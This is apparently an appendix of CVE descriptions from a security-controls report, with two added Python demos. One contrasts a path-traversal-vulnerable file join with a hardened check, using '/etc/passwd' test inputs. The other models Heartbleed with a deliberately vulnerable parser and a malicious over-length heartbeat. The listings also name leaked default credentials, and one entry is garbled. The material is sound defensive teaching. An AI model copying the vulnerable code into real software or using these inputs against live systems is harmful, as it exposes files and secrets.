CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster. Page 20 of 28
CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a //www.google.com substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability".

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability".

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability".

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability".

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that log out the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allow remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to /filesystem.
CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability".

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, and 6.2.1 and 6.2.2 before IF 8, and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, and 6.2.1 and 6.2.2 before IF 8, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.
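CVE-2013-1627 and CVE-2013-5757 are the same bug class: a client-supplied string is passed to the file API as-is, so a full pathname such as /etc/passwd or C:\Windows\win.ini escapes the intended directory without needing any "../" at all. The following added example (not code from the report or from either vendor) shows the vulnerable join pattern beside a containment check that canonicalises the path and insists the result still lies under the document root. DOC_ROOT and the sample requests are constructed for the demonstration.

```python
import os
from pathlib import Path, PurePosixPath, PureWindowsPath
from typing import Optional

# Assumed document root for the example; the directory need not exist.
DOC_ROOT = Path("/srv/webroot").resolve()


def serve_path_vulnerable(requested: str, root: Path = DOC_ROOT) -> Path:
    """The pattern behind both CVEs: the client string is handed to the file
    API with at most a join on the front. os.path.join discards the base when
    the second argument is absolute, so "/etc/passwd" wins outright."""
    return Path(os.path.join(str(root), requested))


def resolve_under_root(requested: str, root: Path = DOC_ROOT) -> Optional[Path]:
    """Hardened variant. Returns the canonical path if it is inside root,
    otherwise None. Absolute paths are rejected under both POSIX and Windows
    rules (a Unix server may still front Windows-style clients), NUL bytes are
    rejected because C file APIs truncate there, and resolve() follows
    symlinks so a link pointing outside root is also refused."""
    if "\x00" in requested:
        return None
    if PurePosixPath(requested).is_absolute() or PureWindowsPath(requested).is_absolute():
        return None
    candidate = (root / requested).resolve()   # collapses ../ and follows symlinks
    try:
        candidate.relative_to(root)            # raises ValueError if outside root
    except ValueError:
        return None
    return candidate


if __name__ == "__main__":
    for req in ("img/logo.png", "/etc/passwd", "../../etc/passwd", "C:\\Windows\\win.ini"):
        print(f"{req!r:28} vulnerable -> {serve_path_vulnerable(req)}  hardened -> {resolve_under_root(req)}")
```

The check is deliberately done after resolve() rather than by string-matching the input: rejecting "../" textually misses URL-encoded, doubled or symlink-based variants, whereas comparing the canonical result against the root catches all of them in one place.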
CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS-SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability".

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44, DSR-150N with firmware before 1.05B64, DSR-250 and DSR-250N with firmware before 1.08B44, and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.
CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
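The over-read in CVE-2014-0160 comes down to one missing comparison: the 16-bit payload_length inside the heartbeat message was trusted, and that many bytes were copied back to the peer even when the enclosing TLS record was only a few bytes long. The added example below (written for this appendix, not OpenSSL's code) models the RFC 6520 message layout in Python and places the pre-1.0.1g logic beside the two bounds checks the 1.0.1g patch introduced. The "adjacent heap" bytes and the heartbeat messages are constructed inputs standing in for whatever really followed the record in memory.

```python
import struct
from typing import Optional

HB_REQUEST = 1
HB_RESPONSE = 2
PADDING_MIN = 16   # RFC 6520: a heartbeat message carries at least 16 bytes of padding


def parse_heartbeat_vulnerable(record: bytes, adjacent_heap: bytes) -> bytes:
    """Pre-1.0.1g behaviour: payload_length is read from the message and that
    many bytes are copied from the payload start, with no comparison against
    the record length. adjacent_heap is a constructed stand-in for the memory
    that followed the record on the heap; a real server leaked it verbatim."""
    payload_length = struct.unpack("!H", record[1:3])[0]
    readable = record[3:] + adjacent_heap          # what memcpy could reach past the record
    return (bytes([HB_RESPONSE]) + struct.pack("!H", payload_length)
            + readable[:payload_length] + b"\x00" * PADDING_MIN)


def parse_heartbeat_fixed(record: bytes) -> Optional[bytes]:
    """The 1.0.1g checks: the header plus minimum padding must fit, and
    type + length + payload + minimum padding must fit inside the record.
    RFC 6520 says a message that fails this is silently discarded (None)."""
    if 1 + 2 + PADDING_MIN > len(record):
        return None
    if record[0] != HB_REQUEST:
        return None
    payload_length = struct.unpack("!H", record[1:3])[0]
    if 1 + 2 + payload_length + PADDING_MIN > len(record):
        return None
    payload = record[3:3 + payload_length]
    return (bytes([HB_RESPONSE]) + struct.pack("!H", payload_length)
            + payload + b"\x00" * PADDING_MIN)


def build_heartbeat(payload: bytes, claimed_length: Optional[int] = None) -> bytes:
    """Build a HeartbeatRequest; claimed_length lets a caller lie about the payload size."""
    length = len(payload) if claimed_length is None else claimed_length
    return bytes([HB_REQUEST]) + struct.pack("!H", length) + payload + b"\x00" * PADDING_MIN


# Constructed inputs for the demonstration.
BENIGN = build_heartbeat(b"ping")                              # honest 4-byte payload
MALICIOUS = build_heartbeat(b"ping", claimed_length=0x4000)    # claims 16 KiB, carries 4 bytes
FAKE_HEAP = b"Cookie: session=abc123\r\n-----BEGIN RSA PRIVATE KEY-----\nMIIEow..."


def leaks_private_key(record: bytes, heap: bytes) -> bool:
    """True if the vulnerable parser echoes heap contents containing key material."""
    return b"PRIVATE KEY" in parse_heartbeat_vulnerable(record, heap)


if __name__ == "__main__":
    print("vulnerable parser leaks key material:", leaks_private_key(MALICIOUS, FAKE_HEAP))
    print("fixed parser discards malicious request:", parse_heartbeat_fixed(MALICIOUS) is None)
    print("fixed parser echoes benign payload:", parse_heartbeat_fixed(BENIGN)[3:7])
```

The same shape of check (compare a length field carried inside the message against the length of the buffer that actually arrived) is what a reviewer should look for in any hand-written parser of length-prefixed records, not only in TLS.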
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability".

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability".

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)".

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion", a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.
CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

